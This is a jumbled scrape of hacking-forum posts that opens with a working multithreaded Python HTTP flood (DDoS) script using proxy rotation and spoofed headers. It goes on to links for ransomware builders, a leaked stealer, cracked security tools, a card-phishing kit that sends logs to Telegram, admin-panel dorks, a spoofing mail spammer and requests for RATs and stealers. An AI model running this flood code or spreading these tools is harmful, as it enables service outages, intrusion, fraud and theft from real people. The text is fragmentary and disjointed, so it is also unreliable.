ip_file = input("Insert txt file of ips > ")
ips = open(ip_file).readlines()
else:
url = input("\nInsert URL/IP: ").strip()
if url == "":
print ("Please enter the url.")
starturl()
try:
if url[0]+url[1]+url[2]+url[3] == "www.":
url = "http://" + url
elif url[0]+url[1]+url[2]+url[3] == "http":
pass
else:
url = "http://" + url
except:
print("You mistyped, try again.")
starturl()
try:
url2 = url.replace("http://", "").replace("https://", "").split("/")[0].split(":")[0]
except:
url2 = url.replace("http://", "").replace("https://", "").split("/")[0]
try:
urlport = url.replace("http://", "").replace("https://", "").split("/")[0].split(":")[1]
except:
urlport = "80"
proxymode()
def proxymode():
global choice2
choice2 = input("Do you want proxy/socks mode? Answer 'y' to enable it: ")
if choice2 == "y":
choiceproxysocks()
else:
numthreads()
def choiceproxysocks():
global choice3
choice3 = input("Type '0' to enable proxymode or type '1' to enable socksmode: ")
if choice3 == "0":
choicedownproxy()
elif choice3 == "1":
choicedownsocks()
else:
print ("You mistyped, try again.")
choiceproxysocks()
def choicedownproxy():
choice4 = input("Do you want to download a new list of proxy? Answer 'y' to do it: ")
if choice4 == "y":
urlproxy = "http://free-proxy-list.net/"
proxyget(urlproxy)
else:
proxylist()
def choicedownsocks():
choice4 = input("Do you want to download a new list of socks? Answer 'y' to do it: ")
if choice4 == "y":
urlproxy = "https://www.socks-proxy.net/"
proxyget(urlproxy)
else:
proxylist()
def proxyget(urlproxy): # lo dice il nome, questa funzione scarica i proxies
try:
req = urllib.request.Request(("%s") % (urlproxy)) # qua impostiamo il sito da dove scaricare.
req.add_header("User-Agent", random.choice(useragents)) # siccome il format del sito e' identico sia
sourcecode = urllib.request.urlopen(req) # per free-proxy-list.net che per socks-proxy.net,
part = str(sourcecode.read()) # imposto la variabile urlproxy in base a cosa si sceglie.
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("proxy.txt","w")
out_file.write("")
out_file.write(proxies)
out_file.close()
print ("Proxies downloaded successfully.")
except: # se succede qualche casino
print ("\nERROR!\n")
proxylist() # se va tutto liscio allora prosegue eseguendo la funzione proxylist()
def proxylist():
global proxies
out_file = str(input("Enter the proxylist filename/path (proxy.txt): "))
if out_file == "":
out_file = "proxy.txt"
proxies = open(out_file).readlines()
numthreads()
def numthreads():
global threads
try:
threads = int(input("Insert number of threads (800): "))
except ValueError:
threads = 800
print ("800 threads selected.\n")
multiplication()
def multiplication():
global multiple
try:
multiple = int(input("Insert a number of multiplication for the attack [(1-5=normal)(50=powerful)(100 or more=bomb)]: "))
except ValueError:
print("You mistyped, try again.\n")
multiplication()
begin()
def begin():
choice6 = input("Press 'Enter' to start attack: ")
if choice6 == "":
loop()
elif choice6 == "Enter": #lool
loop()
elif choice6 == "enter": #loool
loop()
else:
exit(0)
def loop():
global threads
global acceptall
global connection
global go
global x
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
] # header accept a caso per far sembrare le richieste più legittime
connection = "Connection: Keep-Alive\r\n" # la keep alive torna sempre utile lol
x = 0 # thanks therunixx, my friend
go = threading.Event()
if choice2 == "y": # se abbiamo scelto la modalita' proxying
if choice3 == "0": # e abbiamo scelto gli HTTP proxy
for x in range(threads):
RequestProxyHTTP(x+1).start() # starta la classe apposita
print ("Thread " + str(x) + " ready!")
go.set() # questo fa avviare i threads appena sono tutti pronti
else: # se abbiamo scelto i socks
for x in range(threads):
RequestSocksHTTP(x+1).start() # starta la classe apposita
print ("Thread " + str(x) + " ready!")
go.set() # questo fa avviare i threads appena sono tutti pronti
else: # altrimenti manda richieste normali non proxate.
for x in range(threads):
RequestDefaultHTTP(x+1).start() # starta la classe apposita
print ("Thread " + str(x) + " ready!")
go.set() # questo fa avviare i threads appena sono tutti pronti
class RequestProxyHTTP(threading.Thread): # la classe del multithreading
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
threading.Thread.__init__(self)
self.counter = counter
def run(self): # la funzione che da' le istruzioni ai vari threads
useragent = "User-Agent: " + random.choice(useragents) + "\r\n" # scelta useragent a caso
accept = random.choice(acceptall) # scelta header accept a caso
randomip = str(random.randint(0,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255))
forward = "X-Forwarded-For: " + randomip + "\r\n" # X-Forwarded-For, un header HTTP che permette di incrementare anonimato (vedi google per info)
if choice1 == "1":
ip = random.choice(ips)
get_host = "GET " + ip + " HTTP/1.1\r\nHost: " + ip + "\r\n"
else:
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + url2 + "\r\n"
request = get_host + useragent + accept + forward + connection + "\r\n" # ecco la final request
current = x # per dare l'id al thread
if current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy
proxy = proxies[current].strip().split(':')
else: # altrimenti lo prende a random
proxy = random.choice(proxies).strip().split(":")
go.wait() # aspetta che i threads siano pronti
while True: # ciclo infinito
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # ecco il nostro socket
s.connect((str(proxy[0]), int(proxy[1]))) # connessione al proxy
s.send(str.encode(request)) # encode in bytes della richiesta HTTP
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # print delle richieste
try: # invia altre richieste nello stesso thread
for y in range(multiple): # fattore di moltiplicazione
s.send(str.encode(request)) # encode in bytes della richiesta HTTP
except: # se qualcosa va storto, chiude il socket e il ciclo ricomincia
s.close()
except:
s.close() # se qualcosa va storto, chiude il socket e il ciclo ricomincia
class RequestSocksHTTP(threading.Thread): # la classe del multithreading
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
threading.Thread.__init__(self)
self.counter = counter
def run(self): # la funzione che da' le istruzioni ai vari threads
useragent = "User-Agent: " + random.choice(useragents) + "\r\n" # scelta proxy a caso
accept = random.choice(acceptall) # scelta accept a caso
if choice1 == "1":
ip = random.choice(ips)
get_host = "GET " + ip + " HTTP/1.1\r\nHost: " + ip + "\r\n"
else:
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + url2 + "\r\n"
request = get_host + useragent + accept + connection + "\r\n" # composizione final request
current = x # per dare l'id al thread
if current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy
proxy = proxies[current].strip().split(':')
else: # altrimenti lo prende a random
proxy = random.choice(proxies).strip().split(":")
go.wait() # aspetta che threads siano pronti
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True) # comando per proxarci con i socks
s = socks.socksocket() # creazione socket con pysocks
s.connect((str(url2), int(urlport))) # connessione
s.send (str.encode(request)) # invio
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # print req + counter
try: # invia altre richieste nello stesso thread
for y in range(multiple): # fattore di moltiplicazione
s.send(str.encode(request)) # encode in bytes della richiesta HTTP
except: # se qualcosa va storto, chiude il socket e il ciclo ricomincia
s.close()
except: # se qualcosa va storto questo except chiude il socket e si collega al try sotto
s.close() # chiude socket
try: # il try prova a vedere se l'errore e' causato dalla tipologia di socks errata, infatti prova con SOCKS4
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True) # prova con SOCKS4
s = socks.socksocket() # creazione nuovo socket
s.connect((str(url2), int(urlport))) # connessione
s.send (str.encode(request)) # invio
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # print req + counter
try: # invia altre richieste nello stesso thread
for y in range(multiple): # fattore di moltiplicazione
s.send(str.encode(request)) # encode in bytes della richiesta HTTP
except: # se qualcosa va storto, chiude il socket e il ciclo ricomincia
s.close()
except:
print ("Sock down. Retrying request. @", self.counter)
s.close() # se nemmeno con quel try si e' riuscito a inviare niente, allora il sock e' down e chiude il socket.
class RequestDefaultHTTP(threading.Thread): # la classe del multithreading
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
threading.Thread.__init__(self)
self.counter = counter
def run(self): # la funzione che da' le istruzioni ai vari threads
useragent = "User-Agent: " + random.choice(useragents) + "\r\n" # useragent a caso
accept = random.choice(acceptall) # accept a caso
if choice1 == "1":
ip = random.choice(ips)
get_host = "GET " + ip + " HTTP/1.1\r\nHost: " + ip + "\r\n"
else:
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + url2 + "\r\n"
request = get_host + useragent + accept + connection + "\r\n" # composizione final request
go.wait() # aspetta che i threads siano pronti
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # creazione socket
s.connect((str(url2), int(urlport))) # connessione
s.send (str.encode(request)) # invio
print ("Request sent! @", self.counter) # print req + counter
try: # invia altre richieste nello stesso thread
for y in range(multiple): # fattore di moltiplicazione
s.send(str.encode(request)) # encode in bytes della richiesta HTTP
except: # se qualcosa va storto, chiude il socket e il ciclo ricomincia
s.close()
except: # se qualcosa va storto
s.close() # chiude socket e ricomincia
if __name__ == '__main__':
starturl() # questo fa startare la prima funzione del programma, che a sua volta ne starta un altra, poi un altra, fino ad arrivare all'attacco.
1. Download the jar file:
https://github.com/h3110w0r1d-y/BurpLoaderKeygen/releases/tag/1.14
2. Make sure you have java or install from here:
https://www.java.com/en/download/
3. Open Jar file
4. Click option to download latest burp suite version and save it in same
directory
5. Check autorun and change license text if you want
6. Run the program
If you want to make a start menu shortcut for it you can make a batch file with the same content as the "Loader Command" prompt. When you open with that batch file it should now open burp suite without the keygen opening
I'm looking for a DDOS control panel that is reliable and has a lot of traffic from China, any news would be appreciated!
Ищу обход верификации ютуб (
), а точнее таблички при входе на куки ютуба с логов
Нужен фулл софт под ключ для масового залива видео без ограничений
Готов обсуждать ЛЮБУЮ суму, только реальные предложение.
Людям которые ранее с этим не сталкивались - прошу не беспокоить
Телеграм - @silatalock
node flood.js target time threads rate threads
VT -
youk
Download - https://files.fm/u/zhg9h5jf7u
АХТУНГ ТУТ ВСЕ В ОЗНАОКМИТЕЛЬНЫХ ЦЕЛЯХ ()НЕ ПОДСТАВЛЯЙТЕ АДМИНОВ
На архиве пароль
Тут есть
Билдер Пети
Билдер бабука
Билдер хаоса
Билдер рюка
Билдер wannacry
Билдер винлокера и многое другое
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
zo5ndu9stdk-T-Z5ePpIuA)
mega.nz
а еще слив новой версии редлайна
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/zzoAFDiD#RmXTQVqEGAXpCPMZRjzvKpMMMthIO8Z-JBiDXEx6oDg)
mega.nz
Hidden content for authorized users.
](https://anonfiles.com/Veg4n2H4u0/CxSAST.940.Release.Setup_9.4.0.2076_zip)
anonfiles.com
](https://anonfiles.com/F3j2n7H6u8/cxsastcrack_zip)
anonfiles.com
**Download any file from VirusTotal.
The service is provided free of charge.
Password for all archives** "infected"
You can send your hash XSS PM or join here and drop your hash - https://t.me/vtget
Tempest is a command and control framework written in 100% Rust.
This is a research command and control framework. What I mean by this, is that it is meant for research purposes. It is not meant to fully replace cobalt strike and all your other c2s for production ops. When I decided to write this project, I did so for a learning experience. I wanted to sit and try to plan out the design, and run into all the pitfalls along the way and have to solve them for myself. As the project has matured, I have begun to implement other tools or techniques from various other malware authors. I will try to always cite the original sources, the best that I can. If you notice any lack of attribution, please bring it to my attention so that I can add the credit, as it should be. Sometimes I cannot always find the original source, in which cases, I have specified that as well.
Because this is a research c2, the project moves at a slower pace and runs into a lot of issues along the way. So please understand that this is why. What I suggest for how to use this project, is to fork it, modify it, make it your own. Even better, write your own from scratch, using this code as a reference. Read the code, learn the particular techniques, the "why" of certain design decisions, and make your own c2. That's really the point and in my opinion, the most effective use of this framework.
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F840733697%2F4b0443fb-864b-436b-8bdf-d9e8854c6913&hash=f0539c71d4fcc0ebf637b6e7c3298528&return_error=1)
in rust. ](https://github.com/Teach2Breach/Tempest)
A command and control framework written in rust. Contribute to Teach2Breach/Tempest development by creating an account on GitHub.
github.com
hey im looking for Email Scraper Microsoft Advertising.
Ищу софт, чтоб вытаскивать из баз строк, письма ебэй немецкие, подскажите ребят
Roop - инструмент для создания deepfake с помощью Python.
Дипфейки (deepfakes) – это вид манипуляции с видео и аудиозаписями, в которых используются глубокие нейронные сети для создания синтетических (фальшивых) изображений, практически неотличимых от настоящих.
example:
](https://github.com/s0md3v/roop)
one-click face swap. Contribute to s0md3v/roop development by creating an account on GitHub.
github.com
Устанавливаем :
Скачиваем это -> https://drive.google.com/file/d/1eu60OrRtn4WhKrzM4mQv4F3rIuyUXqfl/view?pli=1 , и сохраняем его в каталоге с Roop. После скачивания переименовуем в inswapper_128.onnx
Запускаем :
Code:Copy to clipboard
python run.py
после запуска нас встречает окошко
Select a face -> выбор лица которое должно появиться в итоговом видео.
Select a target -> загрузка видео которое будете использовать для генерации
дипфейка.
после обработки будет создан выходной файл.
доп.аргументы командной строки
Code:Copy to clipboard
options:
-h, --help show this help message and exit
-f SOURCE_IMG, --face SOURCE_IMG
use this face
-t TARGET_PATH, --target TARGET_PATH
replace this face
-o OUTPUT_FILE, --output OUTPUT_FILE
save output to this file
--keep-fps maintain original fps
--keep-frames keep frames directory
--all-faces swap all faces in frame
--max-memory MAX_MEMORY
maximum amount of RAM in GB to be used
--cpu-cores CPU_CORES
number of CPU cores to use
--gpu-threads GPU_THREADS
number of threads to be use for the GPU
--gpu-vendor {apple,amd,intel,nvidia}
choice your GPU vendor
поделитесь пожалуйста чекером cpanel кому не жалко, буду благодарен
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
](https://gofile.io/d/bIOTD5)
Gofile is a free, secure file sharing and storage platform. With unlimited bandwidth and storage, you can easily store and share files of any type without any limits. Our advanced features, such as CDN support and password protection, make Gofile the ideal choice for individuals and businesses...
gofile.io
Добрый день дамы и господа, прошу если у кого есть nessus pro подломанный поделитесь, очень нужен )
Hello all,
I wanted to post this in the "Articles" Section
I was looking to see if anyone has some guides that they use when red teaming
/ pen testing / hacking a company.
Of course I can find some on the normal web, but they dont go as in depth as I
am looking for.
I'm using Cobalt Strike and Metasploit along with PowerSploit and random other tools.
What is your process or a guide that you do after you have initial access (Low priv)
One of the main reasons i'm asking,
I have basically a default windows 10 pc with a beacon sitting on it. After
lookin at winpeas, WES, privesscheck all i can find is the default windows
DLLs and it suggestes DLLHijacking DLLInjection but requires a reboot if i set
that up to call my new one.
There has got to be a better way to not alert the user.
looking for any guides comments ideas on this.
Looking to learn from the Pros.
Thank you.
I'm assuming most pros wont let me watch a live engaugement
Какие песочницы вы знаете? Any.run? hybrid-analysis.com? между тем, одна из наиболее полноценных и "заслуженных" - cuckoo sandbox. Глянуть можно, например на cuckoo.cert.ee. А еще лучше установить такую-же на домашний сервер. или комп)) Если начать гуглить"как установить cuckoo", упретесь в оставшийся без поддержки пайтон2, невозможность установить большинство модулей через pip и easy_install и пр. Между тем, я нашел проект на гитхабе, позволяющий поставить кукоо буквально одной командой. Но, как это часто и бывает с хорошими проектами, он был забрашен автором. Для себя периодически правлю, вроде как работает и работает прекрасно) я отключил доступ в интернет, все работает через InetSim. Хост линукс (хотя ps1 скрипт там тоже имеется). Кто захочет установить - Welcome =) https://github.com/l4ckyguy/boombox. Все инструкции по установке - внутри =)
Google URL Parser
How to use?
Load Proxies [Preferred HQ or use Own IP NONE]
Load Dorks [Strings]
That's it
You must have at least 5 reaction(s) to view the content.
Софт/Бот должен по кукам загружать мое видео с превью, описанием и тегами.
С предложениями писать @TORONTO899
Есть у кого, или подскажите где найти- софт для выгрузки текстовиков passwords из логов в отдельную папку?
Всем привет, может есть какие free стиллеры актуальные?
Буду благодарен за помощь.
I put a lot effort into making this locker. Tried to sell it for a while now without any luck So decided to release it freely to the community. Hopefully someone here finds it useful. If you do, and are feeling generous, checkout the "support" section in the attached doc
You can find the full source code (ZIP file) in the following link;
MEGA link:
https://mega.nz/file/kO01hDyA#Ovfjv1a7PWqmA6tDi9YSKSBiewqj8NfjfS_bvTn0mbk
Password: i$bG4a#KKIQ.Zzh@xUm`[>rYjLkshL)
Лучше всего этот инструмент описал Лука Сафонов:
Burp Suite – это мультитул для проведения аудита безопасности веб-приложений.
Содержит инструменты для составления карты веб-приложения, поиска файлов и
папок, модификации запросов, фаззинга, подбора паролей и многое другое. Также
существует магазин дополнений BApp store, содержащий дополнительные
расширения, увеличивающие функционал приложения. Стоит отметить и появление в
последнем релизе мобильного помощника для исследования безопасности мобильных
приложений — MobileAssistant для платформы iOS.
](https://drive.google.com/file/d/1rW6fh0liBvuJLy7_CcBNOL7Npq3dZzhM/view?usp=sharing)
drive.google.com
Нашёл в одной из открытых директорий фейка который уже используеться архив, сливаю сюда
версия мобильная, присутствует админка по пути /pannello2/ с дефолтными данными для входа 123:123 (изменить можно в файле dati.php)
You must have at least 10 message(s) to view the content.
Есть ли вменяемая программа для поиска лиц по фото?
Имеется ввиду не онлайн сервисы (типа: FindFace и т.д. и пр.)
А для работы на компе с внутренним архивом...
К примеру есть у тебя фото - и нужно пробить есть ли этот человек в базе фоток
на компе (ранее добавленных в базу).
Как аналог МВДшной проге "Портрет-Поиск"
(http://www.portret.tomsk.ru/index.php)
Кто-то тестировал эту прогу?
Тут ещё такое предлагают - сможет кто протестировать?
http://usu.kz/app_raspoznavanie_lica.php#link_voz
EMailFinder - программа для поиска, извлечению e-mail и рассылка оп списку адресов.
О программе
Рассылка писем
Spoiler: Что в архиве
Активация программы :
](https://radikal.ru/video/dCooMwYFPCq)
Радикал-Фото - сервис публикации изображений для форумов и блогов: Видео
radikal.ru
You must have at least 50 reaction(s) to view the content.
Доброго времени суток, коллеги.
Недавно увидел на просторах интернета интересное ПО и дабы не тратить денег решил попробовать взломанную версию бурундучка. Вопрос к знатокам и тем кто уже имел счастье попробовать данный инструмент в бою: смог ли кто запустить и потестить, потому что лично у меня, господа, не получается скинуть себе тестовую сессию?
Заранее благодарю за ответ!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Good day everyone!
Recently I have learned about an interesting software on the Internet and decided to begin with a leaked version. My question to the ones who have already used this tool is if you've had any luck running it on your system and testing it out? I tried a lot but for some reason I cannot get a session.
Thank you in advance.
](https://anonfiles.com/a3tei7Q2y7/YogaDNS_1.35.0.1-Zen_7z)
anonfiles.com
YogaDNS automatically intercepts DNS requests at the system level and allows you to process them over user-defined DNS servers using modern protocols and flexible rules.
INSTRUCTIONS
1. Install using YogaDNSSetup_1.35.0.1.exe
2. Don't run it or if you did, close it from the tray icon.
3. Replace the YogaDNS.exe and ServiceManager.exe exe's into the install
directory ( possibly this will be something like "C:\Program Files
(x86)\YogaDNS")
4. When you run YogaDNS it starts as a tray icon. Double click that icon or
right-click then pick "Open YogaDNS". When it starts if you don't want that
about box popup simply check "Don't show on startup".
5. In the software, be sure to also uncheck "check for product updates on
start" to prevent software overwriting later.
Invicti Professional v24.9.1 - 24 Sep 2024
Download: **_
[ https://ponies.cloud/scanner_web/invicti/Invicti- Professional-v24.9.1-Pwn3rzs-CyberArsenal.rar ](https://ponies.cloud/scanner_web/invicti/Invicti- Professional-v24.9.1-Pwn3rzs-CyberArsenal.rar)
_Password _: Pwn3rzs
Note:
Use the reg file to fix the Renderer error._**
[Changelog.](https://www.invicti.com/changelogs/invicti-
standard/v24-9-1-24-september-2024/)
p.s взято из ТГ. канала: Pwn3rzs
Last crack version for Gammadyne Mailer Version 66.0 (January 9th, 2023)
use it in vm/remote for security work grate but i didnt check for backdoors
Spoiler: VT SCAN
](https://www.virustotal.com/gui/file/ee0e86a96ab85ae86d8b8a50aada4055c330abeb5b8d928c7bd453e2af43ea26)
VirusTotal
www.virustotal.com
Spoiler: Download
Где-то можно такое найти? Подскажите пожалуйста
всем привет , подскажите пожалуйста каким софтом можно чекнуть и валидировать
cpanel и wordpress ?
и может быть кому нибудь будет не трудно подсказать дорки для доступов к веб
хостингам / шеллам и инструменты автоматизации чека ?
ознакомился с форматом форума за короткое время пребывания здесь и от себя пост дополню дорками , которые у меня есть
Spoiler: dorks
admin/index
index.php/admin
wp-admin
admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
wp-login
/backend/
/dsplogin/
/session/
/login/
/storeurl/
/account/login/
/signin.aspx
/painel/
/manage/
/adm/
/cms/
/crm/
/wp/
/support/
/sup/
/admplace/
/control-panel/
admin_login.php
/bvadmin/
/index/key/
phpmyadmin
/index/key/
/key/index/
/downloader/
/sales_order/
/catalog_product/index/key/
catalog_product/index
vultr.com
Credits by uCare for cracking.
Arsenal Kit REPACK!
remote process with code injection. ](https://github.com/boku7/injectAmsiBypass)
Cobalt Strike BOF - Bypass AMSI in a remote process with code injection. - boku7/injectAmsiBypass
github.com
hello I need someone who can develope cash fake transfer
Нужен опытный пользователь CS на уровне кастомизации бекона
П.С.
Пм в личку
Всем доброго дня!
Ребят, нахожусь в поиске данного софта (Email utilita v.3), с офика не могу
взять почему то. Подскажите где можно еще найти?
Private Mail Spammer + Sender Name Spoof
This spammer used to be sold, but the owners closed the project or something like that, in any case the program was broken due to constant checking for updates from the server, which is no longer working. I removed all the problems and errors that occurred. If someone needs this program without a license and stably working - write to me on the forum or in telegram in private messages.
P.S. I will not give it for free, but for a donation I will gladly give this fixed software
Господа и Дамы,вопрос может конечно глупый,но ищу софтец,либо готовое решение либо кто может написать,для импорта и экспорта сесии браузера с мобильных устройств,на базе Ios. Если у кого есть предложение,просьба стукнуть в пм.
У кого есть чекер по номеру на наличие аккаунта WISE?
Связь пм.
user id/password/card info/sms code
Отправка логов в телеграм и прелоадер после каждой отправки перед редиректом
на следующую страницу.
Данные телеграм бота указывать в php файле.
You must have at least 10 message(s) to view the content.
Всем привет, прошу помочь, подскажите или у кого нибудь есть dropper Мальвина? Был бы очень благодарен
![www.itworldcanada.com](/proxy.php?image=https%3A%2F%2Fi.itworldcanada.com%2Fwp- content%2Fuploads%2F2021%2F03%2Fcyber-security-today-text- middle2.png&hash=16763a6e16e6032b9f565d00e788f06d&return_error=1)
Meet HackMachine, a crook’s valuable hacking tool. Welcome to Cyber Security Today. It’s Wednesday, June 30. I’m Howard Solomon, contributing writer on cybersecurity for ITWorldCanada.com. Wonder how crooks break into e-commerce websites to plant malware and steal data? One way is by using...
![www.itworldcanada.com](/proxy.php?image=https%3A%2F%2Fi.itworldcanada.com%2Fwp- content%2Fuploads%2F2018%2F06%2Fcropped-amp- icon-32x32.png&hash=8125f43860de41f28b46ba74a47bb9d2&return_error=1) www.itworldcanada.com
Where can we get this? or something like it
Где мы можем это достать? или что-то в этом роде
https://disk.yandex.ru/d/dipmHCrFBLO2xw <<<---КОМУ НУЖНЫ ИСХОДЫ СУПЕР ПУПЕР
КРИПТОРА -
лол - НЕТ БАРЫГАМ !
Исходы не проверял на закладки.
Отсюда - https://xss.is/threads/95454/
Всем доброго дня) подскажите хороший RAT для Android и ПК))))) Заранее всех благодарю))))
**Новый краулер отProjectDiscovery, создателей
Nuclei,
Subfinder и
**Naabu
Версия 0.0.1
Github
https://github.com/projectdiscovery/katana
Установка
Code:Copy to clipboard
go install github.com/projectdiscovery/katana/cmd/katana@latest
**
Here are some of the generated features from evaluating the source code:
** Cyber Enthusiasts & Data Wizards! Step into the future with DiamondSorter, the all-encompassing suite that's revolutionizing data management and cybersecurity. With a single click, embark on a journey of seamless data sorting, impenetrable security, and unparalleled efficiency.
Seamless Data Sorting & Security Analysis
DiamondSorter's advanced algorithms empower you to sort, analyze, and secure
your data effortlessly. From credit card details to sensitive security data,
manage it all with unmatched precision.
Effortless File Organization
Bid farewell to cluttered directories! Our intuitive interface is your gateway
to organizing files, removing duplicates, and extracting valuable information
with unparalleled ease.
Robust Encryption & Authentication
Fortify your digital assets with DiamondSorter's PGP, encryption keys, and
auth file management tools. Rest assured, your data is shielded against any
threat.
Cookie Management Mastery
Assert dominance over your online presence with our sophisticated cookie
sorting and scraping capabilities. Stay compliant and manage consent with
DiamondSorter's cutting-edge technology.
Targeted Email & Domain Extraction
Unlock new opportunities with our specialized crawlers for business emails and
government domains. Expand your network and reach with pinpoint accuracy.
Real-Time Monitoring & Crawling
Maintain a pulse on your data with real-time monitoring features and powerful
crawling capabilities. Uncover WordPress instances and more, all within
DiamondSorter's dynamic environment.
Statistical Insights & Analysis
Gain a competitive edge with detailed domain stats and analytics. Make
informed decisions and strategize with confidence using DiamondSorter.
Customizable Tools for Every Need
From Chrome extension management to creating password lists, DiamondSorter is
equipped with a diverse set of tools tailored to your unique requirements.
User-Friendly Experience
Enjoy a seamless experience with features like word wrap toggling, trash
removal, and an easy-to-navigate interface. DiamondSorter is designed for both
beginners and experts.
SQL Injection Arsenal
Harness the power of SQL injection and penetrate the defenses of fortified
databases. Diamond Sorter's automated payload delivery and multi-platform
compatibility make it the ultimate tool for exploiting vulnerabilities.
Unlock the Digital Vault
Extract complete credit card information with regex precision. Diamond
Sorter's CC Data Mastery is your gateway to the treasure trove of financial
secrets.
Key to the Kingdom
Generate scripts for Openbullet and more with Diamond Sorter's Config
Developer Assistant. Forge the keys to any cyber fortress and watch as doors
swing open at your command.
🎛 Control Center
Mastermind your hacking operations from Diamond Sorter's control center. Track
tasks, filter targets, and manage processes with the confidence of a cyber
overlord.
Secure,
Sort, and Master Your Data Universe
Diamond Sorter is your comprehensive solution for data extraction, analysis,
and security. With a vast array of functions, this toolkit is designed to
empower users to handle complex data with ease and precision.
Paste
Input
Effortlessly paste clipboard content directly into the input_text widget,
streamlining your data input process.
Replace
With ListButton
Customize your data sets by replacing repeating strings or values across
multiple lines, enhancing consistency and clarity.
Wordpress
Finder
Deploy advanced crawling logic to uncover WordPress instances, revealing a
world of hidden digital landscapes.
Handle
Scrape Keys
Extract valuable keys from your directories, unlocking the potential of secure
data management.
🖥 Server Information & CPanel Accounts
Retrieve critical server information and cPanel account details, ensuring you
have the insights needed for effective web management.
Emails
& Business Emails
Harvest email addresses and business contacts, expanding your network and
outreach capabilities.
Gov
Domains & Member ID PIN
Discover government domains and manage member ID/PIN data with targeted
scraping functions.
Handle
Scrape Security Data
Secure your operations by scraping and analyzing security data, staying one
step ahead of threats.
Handle
Command Link & Telegram Folder Sorting
Organize your digital space with command link handling and Telegram folder
sorting, bringing order to chaos.
Handle
Browser 2FA Extension & Desktop Wallet
Enhance your security posture with browser 2FA extension handling and desktop
wallet management.
Handle
Text Named Sorting & PGP
Sort text by name and manage PGP operations, ensuring your data is both
organized and secure.
Handle
Encryption Keys & Auth Files
Take control of encryption keys and auth files, fortifying your digital
assets.
Handle
Sort by Cookies & Chrome Extensions
Master cookie management and Chrome extensions, tailoring your browsing
experience to your needs.
Handle
New Text Documents & Discord Files
Process new text documents and manage Discord files with ease, keeping your
data streamlined and accessible.
Launch
Domain Manager & Sort Email Domains
